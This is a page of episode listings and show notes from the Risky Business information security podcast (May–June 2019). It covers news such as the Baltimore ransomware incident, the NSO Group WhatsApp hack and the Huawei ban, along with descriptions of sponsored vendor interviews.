Patrick Gray

Risky Business

Risky Business is a weekly information security podcast featuring news and in-depth interviews with industry luminaries. Launched in February 2007, Risky Business is a must-listen digest for information security pros. With a running time of approximately 50-60 minutes, Risky Business is pacy; a security podcast without the waffle.





Feature podcast: An interview with Jim Baker, former general counsel, FBI

Jun 15, 2019


This is the first edition of a new series of podcasts we’re doing here at Risky.Biz that will focus on cyber policy issues. The Hewlett Foundation approached us a while back to see if we’d be interested in doing this series, and we jumped at the opportunity.

The Foundation funds a lot of interesting people and work in the cybersecurity space. So the idea is pretty simple: we can talk to some of Hewlett’s grant recipients or experts in its network about pressing policy issues and turn those conversations into podcasts. The whole idea is to get some policy perspectives out there among the Risky Business audience, which, funnily enough, includes a lot of policy people.

Our first cab off the rank is this interview with Jim Baker. He joined the Department of Justice in 1990 and rose through the ranks to become the FBI general counsel in January 2014, a position he held until December 2017. So of course he was running all things legal for the FBI during the Apple-FBI dispute over a locked iPhone 5C recovered from the gunman responsible for the San Bernardino shooting.

Baker was the US Government’s point man on all things encryption, taking stances that outraged technologists and reinvigorated a policy debate that had – at least to a degree – stagnated for years. These days, Jim Baker serves as Director of the R Street think tank’s National Security and Cybersecurity Program.

This interview focusses on the so-called encryption wars. The FBI and other law enforcement/intelligence agencies want better access to encrypted material, while technologists say that’s impossible to accomplish without introducing unacceptable risks into the technology ecosystem. Baker shares his view on the topic.

The Australian government’s guide for law enforcement and intelligence agencies to the Assistance and Access Act, which is mentioned in the introduction to the podcast, can be found here. (Ironically enough, served over http!)

PLEASE NOTE: Jim Baker joined our meeting via a phone call, so the audio quality here isn’t up to our usual standards. Sorry about that!

Risky Business #545 -- US Government loses control of customs mugshot database

Jun 12, 2019


On this week’s show Adam Boileau and Patrick Gray discuss the week’s news, including:

CBP loses photo and license plate database
Some Android phones shipped with backdoor
Info on Google’s cloud outage
USG ramps up “defend forward”
Trump and Mnuchin can’t get their stories straight on Huawei
The latest from Baltimore, more on that RDP bug
TalkTalk hacker sentenced
Much, much more

This week’s show is brought to you by Remediant! Remediant CEO Tim Keeler will be along this week to have a chinwag. We’ll talk about how simple security tech is really en vogue these days and how that’s a good thing.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
CBP says hackers stole license plate and travelers' photos | ZDNet
Hackers Breach Company That Makes License Plate Readers for U.S. Government - VICE
Maker of US border's license-plate scanning tech ransacked by hacker, blueprints and files dumped online • The Register
Google confirms that advanced backdoor came preinstalled on Android devices | Ars Technica
Two-thirds of iOS apps disable ATS, an iOS security feature | ZDNet
How a Google Cloud Catch-22 Broke the Internet | WIRED
Google Cloud Status Dashboard
U.S. ramping up offensive cyber measures to stop economic attacks, Bolton says
Trump and Mnuchin on Huawei, trade, national security
Huawei executive labeled a 'moral vacuum' in heated UK hearing - CNN
Russia and Iran Plan to Fundamentally Isolate the Internet | WIRED
For two hours, a large chunk of European mobile traffic was rerouted through China | ZDNet
Baltimore’s bill for ransomware: Over $18 million, so far | Ars Technica
A botnet is brute-forcing over 1.5 million RDP servers all over the world | ZDNet
Microsoft warns about email spam campaign abusing Office vulnerability | ZDNet
SymCrypt Bug Would Let Attacker "Take Down Entire Windows Fleet"
Senator asks Department of Justice if it can keep a lid on its software exploits
'You don't stand a chance': how the press freedom argument will go for Assange
TalkTalk hacker Daniel Kelley sentenced to four years - BBC News
A Push to Protect Campaigns from Hackers Hits an FEC Roadblock | WIRED
Top voting machine maker reverses position on election security, promises paper ballots | TechCrunch
Windows 10 zero-day details published on GitHub | ZDNet
Microsoft NTLM Flaws Expose All Windows Machines to RCE Attacks
New RCE vulnerability impacts nearly half of the internet's email servers | ZDNet
Major HSM vulnerabilities impact banks, cloud providers, governments | ZDNet
'RAMBleed' Rowhammer attack can now steal data, not just alter it | ZDNet
A backdoor in Optergy tech could remotely shut down a smart building ‘with one click’ | TechCrunch
That push notification on your phone might be a phishing attempt
New Spam Campaign Controlled by Attackers via DNS TXT Records
Fortune 500 giant Tech Data exposed customer and billing data | TechCrunch
FBI Issues Warning on ‘Secure’ Websites Used For Phishing
Diebold Nixdorf warns customers of RCE bug in older ATMs | ZDNet
Microsoft Blocks Some Bluetooth Devices Due to Security Risks
Apple's 'Find My' Feature Uses Some Very Clever Cryptography | WIRED
VLC 3.0.7 is Biggest Security Release Due to EU Bounty Program
How to create an EVIL LTE Twin – Adam Toscher – Medium

Risky Business #544 -- NYTimes Baltimore report falls over

Jun 5, 2019


On this week’s show Patrick and Adam talk through all the week’s security news, including:

NYTimes story on EternalBlue and Baltimore is bunk
An RDP worm is feeling kind of inevitable
Iran is still getting Shadowbrokersed
Intercept has a great feature on SID Today dumps
Australian Federal Police crack down on national security journalism
Phantom Secure CEO gets nine years and loses $80m
Silk Road 2.0 admin must be an amazing snitch
Another Bitcoin tumbler bites the dust
Much, much more

This week’s sponsor interview is with Marco Slaviero of Thinkst Canary.

Marco is joining us this week to talk about how he thinks web application-based deception techniques are kind of a waste of time right now. We talk about how deception approaches work best in privileged domains, then we talk about how security teams do better when they have a dedicated ops developer.

Show notes
Ruppersberger: NSA has no evidence EternalBlue was in Baltimore attack
Sen. Van Hollen: Government sees no EternalBlue in Baltimore ransomware attack
N.S.A. Denies Its Cyberweapon Was Used in Baltimore Attack, Congressman Says - The New York Times
Report: No ‘Eternal Blue’ Exploit Found in Baltimore City Ransomware — Krebs on Security
Baltimore ransomware perp pinky-swears he didn’t use NSA exploit | Ars Technica
NSA points to two-year patching window in remarks about Baltimore incident
Microsoft's BlueKeep Bug Isn't Getting Patched Fast Enough | WIRED
Even the NSA is urging Windows users to patch BlueKeep (CVE-2019-0708) | ZDNet
New Iranian hacking tool leaked on Telegram | ZDNet
Meltdown Showed Extent of NSA Surveillance — and Other Tales From Hundreds of Intelligence Documents
Federal police raid home of News Corp journalist Annika Smethurst | Australia news | The Guardian
CEO Who Sold Encrypted Phones to the Sinaloa Cartel Sentenced to Nine Years - VICE
Silk Road 2.0 Admin May Only Be Prosecuted For Tax Crimes After Cooperating with Feds - VICE
Bitcoin Blender Exits Cryptocurrency Mixing On Its Own Terms
Rights groups probe investments in NSO Group’s private equity firm
Lorenzo Franceschi-Bicchierai on Twitter: "In his new book, @josephmenn argues that Phineas Fisher, the hacktivist that breached FinFisher and Hacking Team, is perhaps a Russian intelligence front.…"
Much @Stake: The Band of Hackers That Defined an Era | WIRED
Google Cloud goes down, taking YouTube, Gmail, Snapchat, and others with it | ZDNet
China 'rigs' 5G test to favour Huawei - NZ Herald
Russian military moves closer to replacing Windows with Astra Linux | ZDNet
Maze Ransomware Says Computer Type Determines Ransom Amount
Phishing Emails Pretend to be Office 365 'File Deletion' Alerts
Unpatched Flaw Affects All Docker Versions, Exploits Ready
Zero-Day Flaw in Windows 10 Task Scheduler Gets Micropatch
0patch Blog: Another Task Scheduler 0day, Another Task Scheduler Micropatch (The SandboxEscaper Saga)
Flipboard says hackers stole user details | ZDNet
Google Is Finally Making Chrome Extensions More Secure | WIRED
Westpac cyber attack: PayID platform hack exposes private details on 100,000 Australians
Terry Zhang on Twitter: "Received a 40,000$ bounty from @msftsecresponse through @Bugcrowd for a critical Auth Bypass i found on Microsoft Cloud.Also will join the team and talk about it on the BlackHat this year.Thanks for the great bounty and the opportunity sharing on a big stage.…"
New research shows personalized ads are just barely more efficient than dumb ads | ZDNet
Stephen A. Ridley on Twitter: "It has been 10 years since we reverse engineered the MS08-67 patch and published the FIRST public vuln PoC (which was used by the Confiker Worm authors). BUT, it has only been about a year since we got an angry email blaming us for the Confiker worm.…"
Malware Sandbox Online | Free Trial
Thinkst Canary

Risky Business #543 -- NYTimes blames NSA for Baltimore hacks, Assange faces espionage charges

May 29, 2019


Adam Boileau couldn’t make it this week, but that’s ok because we’ve got former Facebook CSO and current Stanford adjunct professor Alex Stamos filling in for him in today’s show. He’ll be talking through all the week’s security news, including:

NYTimes report blames Baltimore ransomware attack on leaked NSA exploit
Assange to face espionage charges, extradition fight looming
SandboxEscaper just keeps dropping those 0days
Fury over Facebook’s response to doctored Pelosi video
Much, much more

This week’s sponsor interview is with David Warburton of F5 Networks. You know F5 as a blinky-light box manufacturer. Load balancers, SSL termination, that sort of stuff. Not exactly a growth industry at the moment, so they’re pivoting.

They’ve dropped $670m on NGINX – F5 now owns the NGINX company – and they’re making all sorts of moves in the appsec space. That interview is mostly about F5’s business, but I found it interesting because what do you do when you’re an $8bn company that makes data-centre equipment and that industry starts going into decline?

Links to everything discussed are below, and you can follow Patrick or Alex on Twitter if that’s your thing.

Show notes
In Baltimore and Beyond, a Stolen N.S.A. Tool Wreaks Havoc - The New York Times
Thomas Rid on Twitter: "Meanwhile I feel rather uncomfortable about being quoted in said NYT story. Although the bigger point stands: whoever was behind Shadowbrokers must be held accountable, and USG should not get away with publicly ignoring this historic leak."
Eternally Blue: Baltimore City leaders blame NSA for ransomware attack | Ars Technica
Google bots shut down Baltimore officials’ ransomware-workaround Gmail accounts | Ars Technica
CyberSecPolitics: Baltimore is not EternalBlue
Errata Security: A lesson in journalism vs. cybersecurity
Intense scanning activity detected for BlueKeep RDP flaw | ZDNet
Researcher publishes Windows zero-days for the third day in a row | ZDNet
Cyber Command's latest VirusTotal upload has been linked to an active attack
The Latest Julian Assange Indictment Is an Assault on Press Freedom | WIRED
Here's How a Facebook Exec Defended Leaving Up That Fake Nancy Pelosi Video
Facebook scrubbed 2.2 billion fake accounts in the first quarter of 2019, a new high
U.S. Navy Creating a 350 Billion Record Social Media Archive
A--Global Social Media Archive, 350 billion digital data records (text) - Federal Business Opportunities: Opportunities
Amazon shareholders reject facial recognition sale ban to governments | TechCrunch
Facial Recognition Has Already Reached Its Breaking Point | WIRED
Android and iOS devices impacted by new sensor calibration attack | ZDNet
Privacy Preserving Ad Click Attribution For the Web | WebKit
German Minister Wants Secure Messengers To Decrypt Chats
European police seize BestMixer, saying it helped launder $200 million worth of cryptocurrency
Chinese military to replace Windows OS amid fears of US hacking | ZDNet
First American Financial Corp. Leaked Hundreds of Millions of Title Insurance Records — Krebs on Security
Australian tech unicorn Canva suffers security breach | ZDNet
Equifax is spending a ton of money on cybersecurity. Wall Street analysts don't like it.
Democratic Party’s network security still lags behind GOP, researchers find | Ars Technica
NSS ISSUES STATEMENT — NSS Labs, Inc.
CrowdStrike, NSS Labs resolve court battle over product testing | ZDNet
Security Engineer, Detection - Google - Sydney NSW, Australia - Google Careers
Security Engineer, Information Security and Privacy Incident Response - Google - Sydney NSW, Australia - Google Careers
Malware Sandbox Online | Free Trial
F5 Networks | Secure application delivery

Risky Biz Soap Box: VMRay CEO Carsten Willems talks sandbox tech

May 23, 2019


This is not the regular Risky Business weekly show; the Soap Box series of podcasts that run on Risky.Biz are wholly sponsored. Everyone you hear in Soap Box paid to be here.

With that disclaimer out of the way, this is actually a really interesting conversation. Carsten Willems is the co-founder and CEO of VMRay, a company that makes… well… what do you call it? Is it an incident response tool? Is it a detection tool? Or is it just a good hypervisor-based sandbox that you can use to do both of those things?

I’m going to say it’s the third – VMRay is a company that makes a great hypervisor sandbox and has applied that technology to both response and detection.

In an ideal world you’d have a team of malware reversers on staff pulling apart every single binary that looks shady. But this isn’t a perfect world, so that’s never going to happen. So the original use case that Carsten and his team set out to solve was around automating malware reversing. They built a hypervisor-based sandbox that’s very hard to bypass: you can run your standard build on it, throw binaries and documents at it and see what blows up. That’s really the primary use case here.

But there is a second use case, which is detection. VMRay can give you a pretty decent risk score on samples, and they’ve entered into a few OEM arrangements with vendors to provide that extra level of detection.

I’d never met Carsten Willems before we prepared this podcast, but it’s safe to say we hit it off. This podcast basically turned into Carsten telling his story, the story of where VMRay came from and where he wants it to go. Enjoy!

Show notes
Malware Sandbox Online | Free Trial

Risky Business #542 -- Confusion reigns over Huawei ban

May 22, 2019


On this week’s show Patrick and Adam talk through all the week’s security news, including:

New executive order paved way for Huawei ban
Google pulls service from Huawei
No wait, that’s not right, it’s for new handsets
The ban’s now reversed to allow them to continue the support that they didn’t have to discontinue? I’m so confused ¯\_(ツ)_/¯
Israeli broadcaster fingers Hamas over Eurovision coverage hack
New moves to regulate offensive cyber services
Salesforce has a bad time
Instagram influencers have a bad time (Hah!)
OGUsers pwned
Much, much more

This week’s show is brought to you by CMD Security. They make security software for Linux that does two things – firstly it gives you visibility into what’s happening on your Linux workloads, which actions are being performed by which accounts, that sort of thing. The second thing it does is allow you to lock down accounts by action, rather than by traditional privilege. They’re funded by Google Ventures, among others, and although they’re a relatively small and new company I think they’re going to do really well.

Jake was just at a MITRE conference in Brussels that was all about the ATT&CK matrix. He’s joining me this week to have a bit of a talk about his experience at that event, then we’ll be talking through some of the issues he’s seeing out there in Linux cloud workload land. Jake’s a great communicator and a very smart guy and that interview is a lot of fun.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
White House executive order sets path for ban on Huawei
Exclusive: Google suspends some business with Huawei after Trump blacklist - source - Reuters
Google's Huawei Android restrictions: what does it mean for you? [Updated] | TechRadar
Trump grants temporary reprieve from Huawei ban | Financial Times
Israel’s national broadcaster accuses Hamas of Eurovision hack | Jewish News
Lawmakers seek probe on U.S. hacking services sold globally - Reuters
U.S. lawmakers call on spy chief to rein in spread of hacking tools - Reuters
Facebook bans Israeli company that's been sharing disinfo on West African politics
Faulty database script brings Salesforce to its knees | ZDNet
Millions of Instagram influencers had their private contact data scraped and exposed | TechCrunch
Account Hijacking Forum OGusers Hacked — Krebs on Security
The Most Expensive Lesson Of My Life: Details of SIM port hack
Chinese cyberspies breached TeamViewer in 2016 | ZDNet
Baltimore ransomware nightmare could last weeks more, with big consequences | Ars Technica
Ohio school sends students home because of Trickbot malware infection | ZDNet
Google Will Replace Titan Security Key Over a Bluetooth Flaw | WIRED
Bluetooth's Complexity Has Become a Security Risk | WIRED
First official version of Tor Browser for Android released on the Play Store | ZDNet
Root account misconfigurations found in 20% of top 1,000 Docker containers | ZDNet
The Crowd, The Source… – CTUS.IO
New windows LPE from non-admin :) : AskNetsec
How CSIRO Computers Were Secretly Used To Mine Bitcoin | 10 daily
Company behind LeakedSource pleads guilty in Canada | ZDNet
Bots Tampering with TLS to Avoid Detection - Akamai Security Intelligence and Threat Research Blog
Hackers abuse ASUS cloud service to install backdoor on users’ PCs | Ars Technica
The radio navigation planes use to land safely is insecure and can be hacked | Ars Technica
1801 - Visual Voicemail for iPhone: Use-after-free in IMAP NAMESPACE processing - project-zero - Monorail
Hackers Inject Magecart Card Skimmer in Forbes’ Subscription Site
Microsoft releases new version of Attack Surface Analyzer utility | ZDNet
Cisco Upgrades Remote Code Execution Flaws to Critical Severity
Additional mitigations for speculative execution vulnerabilities in Intel CPUs - Apple Support
AT&T Homepage Mistakenly Warns Users of a Non-Existent Data Breach - VICE
Encryption fix may now be dead
Request a live demo

Risky Biz Soap Box: Signal Sciences on serverless, app-layer deception and more

May 16, 2019


This isn’t our weekly news and current affairs show, this is a wholly sponsored podcast we do here at Risky Biz. The idea behind Soap Box is vendors pay to come on to the show and talk about the things they want to talk about.

Today’s Soap Box is brought to you by Signal Sciences. If you’re not familiar with them, they make web security software. If you operate a website and you’re looking to auto-block a lot of the common attacks and attack techniques that are likely to be directed against your website, then Signal Sciences are definitely worth a look.

Their whole pitch is really about making software that’s easy to deploy. You just drop it on your web server or run it as a WAF proxy, and bang, you’re done. Most of their clients run this software in full blocking mode out of the gate and don’t have any issues.

It’s really, really good at blocking stuff like cred stuffing and weird bot activity, as well as your typical OWASPY-style attacks.

Signal Sciences Trusted Appsec Advisor Phillip Maddux is our guest today. We spoke about a bunch of stuff really: the future of appsec, how the pivot to serverless is changing things. Then we talk about app-layer deception, and finally Phillip basically takes a dump on the bulk of RASP solutions out there.


Show notes
Dear RASP: We Need to Talk About the Friction in Our Relationship

Risky Business #541 -- NSO Group makes global headlines. What next?

May 15, 2019


On this week’s show Patrick and Adam talk through all the week’s security news, including:

NSO Group WhatsApp vuln coverage goes nuclear
Activists targeted by NSO malware in hiding in west after CIA tipoffs
Cisco Trust Anchor drags on sea floor
Linux kernel bugs likely overhyped
Adobe patches insane number of CVEs
Microsoft patches rumoured GCHQ VEP’d RDP bug
New hardware bugs affect Intel processors
SHA-1 collisions become much more practical
Major US anti-virus firms owned hard

This week’s sponsor interview is with Ryan Kalember of Proofpoint. Ryan is a listener, and when he heard Adam talking about how password rotations actually result in crappy passwords, it hit a nerve with him. He says Proofpoint, via its CASBY product, is seeing a lot of targeted credential stuffing campaigns cycling through variations of passwords that have appeared in dumps.

Apparently the bad guys are hip to what a typical password rotation variation looks like and they’re using this knowledge to better direct their cred stuffing attempts.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
How Hackers Broke WhatsApp With Just a Phone Call | WIRED
Israel gives 'Pegasus' spyware to countries like Saudi Arabia
CIA Sent Warnings to 3 Khashoggi Associates About New Saudi Threats | Time
WhatsApp Hack Shows End-to-End Encryption Is Pointless - Bloomberg
The NSO WhatsApp Vulnerability - This is How It Happened - Check Point Research
It’s Almost Impossible to Tell if Your iPhone Has Been Hacked - VICE
Human rights groups to ask Israeli court to revoke NSO Group’s export license
A Cisco Router Bug Has Massive Global Implications | WIRED
Linux Kernel Prior to 5.0.8 Vulnerable to Remote Code Execution
Security Updates Released for Adobe Flash Player, Reader, and Media Encoder
Microsoft Patches ‘Wormable’ Flaw in Windows XP, 7 and Windows 2003 — Krebs on Security
Microsoft SharePoint vulnerability allows hackers to sift through servers, Saudi authorities warn
Two years after WannaCry, a million computers remain at risk | TechCrunch
Intel CPUs impacted by new Zombieload side-channel attack | ZDNet
ZombieLoad attack lets hackers steal data from Intel chips - The Verge
Patch status for the new MDS attacks against Intel CPUs | ZDNet
SHA-1 collision attacks are now actually practical and a looming danger | ZDNet
NVIDIA Patches High Severity Windows GPU Display Driver Flaws
Keyloggers Injected in Web Trust Seal Supply Chain Attack
Fxmsp Chat Logs Reveal the Hacked Antivirus Vendors, AVs Respond
New Details Emerge of Fxmsp's Hacking of Antivirus Companies
DOJ Says Chinese Hackers Attacked Anthem, but Not Why | WIRED
“RobbinHood” ransomware takes down Baltimore City government networks | Ars Technica
Julian Assange to face revived rape investigation in Sweden
Former NSA analyst charged in leak of classified documents to reporter
New leaks of Iranian cyber-espionage operations hit Telegram and the Dark Web | ZDNet
Jokeroo Ransomware as a Service Pulls an Exit Scam
Nigerian BEC Scammers Shifting to RATs As Tool of Choice
Mozilla offers research grant for a way to embed Tor inside Firefox | ZDNet
Experts Doubt Russian Claims That Cryptographic Flaw Was a Coincidence - VICE
Microsoft recommends using a separate device for administrative tasks | ZDNet
Unsecured server exposes data for 85% of all Panama citizens | ZDNet

Risky Business #540 -- In depth: Hamas cyber unit destroyed in air strike

May 8, 2019


On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including:

IDF takes out Hamas cyber HQ (Features commentary from Bobby Chesney and Klon Kitchen)
NYTimes mangles Symantec’s “Buckeye” research
Lots of dark web arrests
SAP exploits not all they’re cracked up to be
Magecart-style attacks spread to other platforms
Tech-led crackdown on Chinese Muslims intensifies
Japan to create “defensive malware”

This week’s sponsor interview is with Duo Security advisory CSO Richard Archdeacon and we’ll be talking about zero trust networks. Richard isn’t so worried about every vendor under the sun claiming to be a zero trust tech company. He doesn’t think that’s going to derail the move to zero trust architectures because the move towards them is too strong.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Israel Defense Forces on Twitter: "CLEARED FOR RELEASE: We thwarted an attempted Hamas cyber offensive against Israeli targets. Following our successful cyber defensive operation, we targeted a building where the Hamas cyber operatives work. HamasCyberHQ.exe has been removed.…"
Crossing a Cyber Rubicon? Overreactions to the IDF’s Strike on the Hamas Cyber Facility - Lawfare
Daniel Moore on Twitter: "It's also possible that they claim this is a kinetic response to a cyber-attack, but in reality the IDF is just bombing more convenient, low-risk elements of Hamas out of its extensive target bank. So possibly more capitalising on an opportunity than direct retaliation.…"
Inbar Raz on Twitter: "If there had been only one strike, and it had been directed at the Cyber unit, then that would have been a remarkable and unusual event. But it wasn’t. It’s just one more building with “Hamas” written all over it. 3/N…"
Buckeye: Espionage Outfit Used Equation Group Tools Prior to Shadow Brokers Leak | Symantec Blogs
How Chinese Spies Got the N.S.A.’s Hacking Tools, and Used Them for Attacks - The New York Times
A Mysterious Hacker Group Is On a Supply Chain Hijacking Spree | WIRED
FBI has seized Deep Dot Web and arrested its administrators | TechCrunch
Law enforcement seizes dark web market after moderator leaks backend credentials | ZDNet
Public 10KBLAZE Exploits May Impact 90% of SAP Production Systems
sap_ms/ at master · gelim/sap_ms · GitHub
JavaScript card sniffing attacks spread to other e-commerce platforms | ZDNet
A hacker is wiping Git repositories and asking for a ransom | ZDNet
Mysterious hacker has been selling Windows 0-days to APT groups for three years | ZDNet
China uses biometrics and digital scanning 'data doors' to track Muslim minority | ZDNet
Uyghurs the People of Xinjiang - Rear Vision - ABC Radio National (Australian Broadcasting Corporation)
CIA sets up shop on the anonymous, encrypted Tor network - CNET
China making 'rapid progress' on potency of cyber-operations, Pentagon says
Japanese government to create and maintain defensive malware | ZDNet
Hacker takes over 29 IoT botnets | ZDNet
Only six TSA staffers are overseeing US oil & gas pipeline security | ZDNet
Dutch intelligence warns of escalating Russian, Chinese cyberattacks in the Netherlands
NSA unmasked more U.S. entities caught in foreign cyber-espionage efforts last year
WordPress finally gets the security features a third of the Internet deserves | ZDNet
Verizon, T-Mobile, Sprint, and AT&T Hit With Class Action Lawsuit Over Selling Customers’ Location Data - VICE
Firefox add-ons disabled en masse after Mozilla certificate issue | ZDNet
Labor asks questions of WeChat over doctored accounts, 'fake news'
Evil Clippy Makes Malicious Office Docs that Dodge Detection
Dell laptops and computers vulnerable to remote hijacks | ZDNet
AWS IAM Exploitation – Security Risk Advisors
Zero Trust Evaluation Guide: For the Workforce | Duo Security

Snake Oilers 9 part 2: Rapid7 talks SOAR, Trend Micro on its API-based email security play

May 2, 2019


This isn’t the regular weekly risky biz news and current affairs show, this is the special podcast series we do here at Risky Biz HQ where we take that dirty, dirty vendor cash and let security companies tell the audience all about what they do. Think of it as show and tell for security vendors!

In this edition we’ve got three more vendors vying for your hard-earned bread. We’ll be hearing from Rapid7 on their InsightConnect product, which used to be known as Komand. What can you automate and orchestrate with it? How does it work? Who’s using it? What are they doing with it?

Then we’ll be hearing from Trend Micro about their O365 mail security product, and this one is legit interesting for one very simple reason – the deployment method. Most of the mail security firms basically make you route your mail through them.

In this case what Trend has done is create a mail security product that just fiddles with your mailboxes through the Microsoft O365 API. They have literally set up a demo account for an enterprise over a beer at a bar. So yeah, I suspect we’ll be seeing more mail security products deploying this way… and because it’s show and tell, Trend will be along to talk about some of the bells and whistles that come with that product.

Then finally we’ll be hearing from Cybermerc. This is a group based out of Canberra in Australia. They’ve done a lot of enterprise deception as a hybrid hardware/consulting offering, and that’s something they’ve gotten very good at. They also do a lot of cyber cyber training, but now they’re trying to market a managed service towards small to medium businesses – those with 50 to a few hundred seats. A managed honeypot, some internal vuln scans, and a partridge in a pear tree!

Show notes
Security Orchestration and Automation with InsightConnect | Rapid7
XGen Email Security Smart Protection for Office 365 | Trend Micro
Cybermerc

Risky Business #539 -- Docker Hub owned, Cloudflare, Bloomberg under fire

May 1, 2019


On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including:

Docker Hub owned
That Confluence bug we were talking about a couple of weeks ago got wormified
Oracle WebLogic users also having a bad time
Cloudflare faces investor pressure over providing services to Nazis
Slack warns investors of possible nation-state attacks against it
Norsk Hydro puts dollar value on ransomware incident
Bloomberg publishes another ridiculous security story
Much, much more!

This week’s sponsor interview is with Casey Ellis, the CTO and co-founder of Bugcrowd.

As most of you are probably aware, Bugcrowd announced its so-called “next generation penetration testing” product last year, a move followed some months later by its competitor HackerOne. With others in the bounty space already offering these types of penetration testing packages, it looks like these efforts are here to stay.

But where do crowdsourced penetration tests sit in the wider penetration testing market? Are they coming after the Insomnia and Atredis Partners type firms? The NCCs? The shonky nessus-scan “penetration testers”? Well, not surprisingly Casey argues that this is a new sub-niche in the market and he makes a pretty compelling case to support that argument.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Docker Hub hack exposed data of 190,000 users | ZDNet
two-factor authentication · Issue #358 · docker/hub-feedback · GitHub
Slack warns investors of a high risk of cyber-attacks impacting stock performance | ZDNet
Vulnerable Confluence Servers Get Infected with Ransomware, Trojans
Recent Oracle WebLogic zero-day used to infect servers with ransomware | ZDNet
Norsk Hydro: Attack Cost $50M
The SIM Swap Fix That the US Isn't Using | WIRED
California synagogue shooting casts harsh light on mutual-fund darling Cloudflare - Reuters
Sleeping Giants on Twitter: "REMINDER: 8Chan, where the anti-Semitic shooter from today AND the New Zealand shooter posted manifestos and their fans cheer the killings, is protected by @Cloudflare and their CEO @eastdakota, who doesn’t have any regrets about it at all.…"
Catalin Cimpanu on Twitter: "Today in infosec news: Another low-quality Bloomberg article where the reporter converts a random 10-year-old long-time-patched vulnerability into a national security threat.... because Bloomberg reporters get paid for "market-shifting news" ....which means "horrendous clickbait"…"
Oh dear. Secret Huawei enterprise router snoop 'backdoor' was Telnet service, sighs Vodafone • The Register
Man who allegedly leaked CIA hacking tools says he's been tortured and is owed $50 billion
Hackers Steal and Ransom Financial Data Related to Some of the World’s Largest Companies - Motherboard
NSA's Russian cyberthreat task force is now permanent
DNS hacks are attacks on critical infrastructure, senior U.S. diplomat says
New DHS order pushes agencies to quickly patch vulnerabilities
Microsoft is considering dropping its Windows password expiration policy | TechCrunch
Microsoft Outlook Email Breach Targeted Cryptocurrency Users - Motherboard
Chinese dev jailed and fined for posting DJI's private keys on Github • The Register
Probable Russian Navy covert camera whale discovered by Norwegians | Ars Technica
CARBANAK Week Part Four: The CARBANAK Desktop Video Player | FireEye Inc
Port Scanning, Spoofing & Blacklists – notdan – Medium
Bat bomb - Wikipedia
Project Pigeon - Wikipedia
Next Gen Pen Testing

Risky Business #538 -- Marcus Hutchins is a milkshake duck, Iranian APTs doxxed and more

Apr 25, 2019


On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including:

Marcus Hutchins faces his milkshake duck moment
Iranian APT crew gets Shadowbrokersed
DNS interference campaign is actually two large-scale actors
UK to use some Huawei components in 5G build
French Government launches comms app for politicians, it doesn’t go well
More detail on CCleaner/ASUS crew
Carbanak source found on VT (lol)
Wall Street Market exit scams
BEC costing US firms $1.3bn PA
Much MOAR!

This week’s show is brought to you by Signal Sciences. Their CEO, Andrew Peterson, will be along in this week’s sponsor interview to have a bit of a chat about how a lot of traditional enterprises are running serious web app shops these days.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Marcus “MalwareTech” Hutchins Pleads Guilty to Writing, Selling Banking Malware — Krebs on Security
filsy on Twitter: "The whole internet loves MalwareShake Duck, a lovely duck that saved the internet. *12 months later* We regret to inform you that the duck was the author of malware that stole your grandmothers lifesavings."
A Mystery Agent Is Doxing Iran's Hackers and Dumping Their Code | WIRED
Patrick Gray on Twitter: "This development raises serious questions, like: 1. When will SIGINT agencies start publishing zines? 2. Which nation state actors will produce the best defacement art and smack talk?"
Talos Blog || Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: DNS Hijacking Abuses Trust In Core Internet Service
Talos Blog || Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: DNSpionage brings out the Karkoff
Wipro Intruders Targeted Other Major IT Firms — Krebs on Security
The Weather Channel goes off the air for 90 minutes after ransomware infection | ZDNet
Manufacturing giant Aebi Schmidt hit by ransomware | TechCrunch
Huawei will help build Britain’s 5G network, despite security concerns - The Verge
U.S. and British Intelligence Agencies Downplay Disagreement Over Huawei 5G
Huawei frustration boils over as CIA allegedly shows the goods
French government releases in-house IM app to replace WhatsApp and Telegram use | ZDNet
Congress sends letter to Google for details on Sensorvault location tracking database | ZDNet
Supply Chain Hackers Snuck Malware Into Videogames | WIRED
Source code of Carbanak trojan found on VirusTotal | ZDNet
A 'Blockchain Bandit' Is Guessing Private Keys and Scoring Millions | WIRED
Another dark web marketplace bites the dust --Wall Street Market | ZDNet
FBI: US companies lost $1.3 billion in 2018 due to BEC scams | ZDNet
Security flaw lets attackers recover private keys from Qualcomm chips | ZDNet
Security flaw in EA’s Origin client exposed gamers to hackers | TechCrunch
RCE in EA's Origin Desktop Client – Underdog Security – Our blog...
More Security Endpoint Tech Isn't Always Better | Decipher
Chaos on Twitter: "last week i got to witness an engineering department lose a full day's work because if you put an emoji in a git commit message, Atlassian Bamboo chokes on it forever and you're forced to rebase master, like you should NEVER DO. this was of course referred to as The Emojiency"
Australian Lime Scooters Hacked To Say Sexual Things To Riders | Gizmodo Australia
Demand More from Your Web Application Security | Signal Sciences

Snake Oilers 9 part 1: The best Snake Oilers edition we've ever run

Apr 23, 2019


On this edition of Snake Oilers you’ll be hearing from three vendors offering what I believe to be excellent security technology. I haven’t personally used this tech, but conceptually everything featured in this edition is The Good Stuff. You’ll see. Or hear. You know what I mean.

First up we’ll be hearing from Cmd, which makes killer software for Linux that lets you lock down account actions. Not permissions, actions. Do all the default and service accounts you have to run on your Linux fleet terrify you? Well, this is a solution for that. There’s a visibility component there, too.

Then we’ll be hearing from AlphaSOC. When we last spoke to them they were just doing domain-based analytics, but they’ve expanded their tech and now offer IP-based and HTTP request-based analytics. You can deploy AlphaSOC as a Splunk app or hook up to their API any other way you want. They’re offering free trials, but even when you’re on the paid service it’s actually pretty affordable.

The brain behind AlphaSOC is Chris McNab who used to run incident response at NCC Group. He’s seen how the planes crash into the mountains and he has created a product that performs eminently sensible analysis on your traffic and metadata to alert you to badness.

